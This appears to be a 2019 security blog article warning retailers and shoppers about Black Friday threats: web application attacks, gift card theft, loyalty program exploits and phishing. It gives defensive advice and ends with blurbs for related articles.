Retail cybersecurity is always crucial, but it’s officially time for both retailers and customers to prepare for Black Friday. This year, analysts predict global retail sales on Black Friday and Cyber Monday will hit $7.5 billion, a 20 percent increase over 2018.

Cybercriminals are known to follow the money. The retail industry is a top target for financially motivated attacks year-round, and threat actors view holiday sales as an opportunity to strike it rich. The rate of cyberattacks against retailers spikes every November in the days after Thanksgiving.

Consumers and retailers should prepare for Black Friday security risks with awareness and vigilance. This year’s holiday shopping season is likely to include a mixture of attacks, including familiar threats and emerging techniques.

How to Protect Against 2019 Retail Cybersecurity Threats

There are clear risks associated with a retail cybersecurity incident. Customer trust is a major form of competitive currency for retailers, and a Black Friday security breach with data loss can cost retailers an average of $3.92 million and have long-term effects on sales and customer loyalty.

One-fifth of consumers will permanently take their retail business to a different company after a data breach, per KPMG. Thirty-three percent would take a break from shopping with a breached retailer for an extended period of time.

The possible risks of being victimized range in size and impact. A web application attack could cost millions, while a smaller-scale attack on gift cards or loyalty programs could cost thousands in stolen products. However, any loss of customer data may result in damaged trust.

Here are four risks to keep an eye out for this shopping season.

1. Web Application Attacks

Web application attacks represented 63 percent of data breaches in the retail industry over the past year, according to the 2019 Verizon Data Breach Investigations Report (DBIR). That’s a 58 percent increase since 2014. Some of the most common methods involved in retail web app attacks included malware to capture app data, spyware and keyloggers.

Across all industries, attacks against web applications are on the rise. Retailers are experiencing significantly less physical tampering and POS attacks than in years past, per Verizon. Web app attacks are part of a growing trend away from physical card theft, or “card-present” fraud, and toward card-not-present attacks.

The best defenses against spyware, keyloggers and other targeted malware include detection and mitigation capabilities that can identify malicious activity during the surge of Black Friday e-commerce activity.

2. Gift Card Theft

Consumers have become savvy about the risks and signals of credit card fraud. Most people check financial accounts regularly for signs of suspicious activity. As a result, thieves are now exploiting a different angle for financial gain that’s likely to go unnoticed.

“Who checks their gift card balances on a daily basis?” security principal Rick McElroy said in an interview with CNBC Make It. “Thieves get a lot longer to hide.”

Threat actors are stealing gift card data in multiple ways, including tampering with cards in brick-and-mortar stores to capture card numbers before a purchase. Krebs on Security reported that thieves scratch the backs of gift cards on retail racks to steal pin numbers, and cover their tracks with a widely available tape product.

There’s also been a surge of gift card attacks that use evolving digital methods, including bots that test millions of possible gift card numbers and PINs on retailer websites.

Retailers with physical locations should monitor for suspicious activity near card racks or consider putting gift cards behind the counter. Offering customers the opportunity to register cards online and choose a new PIN upon registration can help protect against theft as well. Finally, be sure to stay vigilant for signs of bot activity.

As a customer, avoid maintaining high balances on gift cards for long lengths of time whenever possible. Register retail gift cards online using a unique username and password, and change your PIN whenever possible. Finally, take a moment to inspect gift cards visually in-store for any signs of physical tampering or purchase cards online to mitigate risks.

3. Loyalty Program Exploits

Thirty-six percent of retail data breaches in the past year targeted customers’ personal information or user credentials. Loyalty programs are an increasingly common angle for cybercriminals, and the retail and hospitality industries are key targets. Gaining access to a customer’s retail loyalty account can offer multiple forms of payoff. Once inside, thieves can access loads of personal info, steal loyalty reward points or, if they’re really lucky, access stored credit card data.

As a retailer, it’s important to monitor year-round for signs of loyalty program exploits by staying vigilant for unusual sign-in behaviors or surges of loyalty point redemption. Adopting stronger password requirements can minimize the risk of customer accounts being compromised due to recycled or easily guessed passwords.

It’s risky business for customers to recycle passwords across multiple loyalty accounts, especially if you store your credit card on file. If you’re guilty of lazy password habits, consider updating your password for online retail accounts.

4. Social Engineering Attacks

The majority of retail cybersecurity events involve external threat actors. Just 19 percent of attacks last year involved inadvertent insider errors. However, studies show that retail is uniquely vulnerable to social engineering threats, including phishing and vishing attacks.

Cybercriminals are likely to exploit distracted workers during the surge of retail sales in the weeks ahead. Retailers should double-down on training and awareness activity, including efforts to educate seasonal hires.

Similarly, consumers should keep watch for social engineering attacks. The Cybersecurity and Infrastructure Security Agency (CISA) has issued an official warning to consumers about emails that contain malicious attachments or links during the upcoming holiday shopping season. SMS phishing, or smishing, is another form of social engineering attack that will likely be used in the weeks to come.

Remember, cybercriminals exploit distractions and emotions like panic. Remain watchful for emails or text messages that alert you to suspicious account activity or fake shipping invoices from major retailers. It’s wise to avoid clicking links or opening attachments, especially in text messages. Call a retailer’s customer service department if you receive suspicious account alerts.

Retail Cybersecurity Risks Will Spike on Black Friday and Cyber Monday

Retailers and customers can comfortably predict that they’ll be targeted on Black Friday and Cyber Monday. The single most important means of protection is vigilance. Don’t allow yourself to get so mixed up in the rush of rock-bottom prices that you forget to exercise secure behaviors or monitor for suspicious activity. Black Friday security threats tend to exploit distracted retail employees especially.

Consumers need to watch out for copycat emails and text messages to avoid being hooked by social engineering attacks. While it’s not possible or practical to monitor all of your gift card balances and loyalty accounts, be aware that maintaining high balances on gift cards can put you in the crosshairs. Fortunately, strong password practices can mitigate many of the risks tied to account compromise and loyalty point theft.

More from Retail

Cost of a Data Breach: Retail Costs, Risks and Prevention Strategies

Whether it’s online or brick-and-mortar, every new store or website represents a new potential entry point for threat actors. With access to more personally identifiable information (PII) of customers than most industries, bad actors perceive retail as a great way to cash in on their attacks. Plus, attackers can duplicate attack methods more easily since retailers share similar cybersecurity infrastructure. The good news for retail is that the cost of a data breach in the sector remains low compared to…

Lessons Learned by 2022 Cyberattacks: X-Force Threat Intelligence Report

Every year, the IBM Security X-Force team of cybersecurity experts mines billions of data points to reveal today’s most urgent security statistics and trends. This year’s X-Force Threat Intelligence Index 2022 digs into attack types, infection vectors, top threat actors, malware trends and industry-specific insights. This year, a new industry took the infamous top spot: manufacturing. For the first time in over five years, finance and insurance were not the top-attacked industries in 2021, as manufacturing overtook them by a…

Magecart Attacks Continue to ‘Skim’ Software Supply Chains

Did your company or e-commerce firm recently buy third-party software from a value-added reseller (VAR) or systems integrator? Did you vet the vendor code? If not, you could be at risk for a Magecart group attack. Magecart is an association of threat actor groups who target online shopping carts, mostly from within the e-commerce platform Magento. The Magecart name is derived by combining ‘Mage’ (from Magento) with ‘cart’ (shopping cart). This type of attack is especially dangerous as it only…

Omnichannel E-commerce Growth Increases API Security Risk

Today, a lot of the digital innovation we see is largely thanks to the application programming interface (API). Without APIs, rapid development would be nearly impossible. After all, the API is the link between computers, software and computer programs. But wherever there’s a link, a potential data security weakness exists. Essential for modern mobile, SaaS and web applications, APIs are nearly ubiquitous in everything from front office, back office and internal applications. By nature, however, APIs expose application logic and…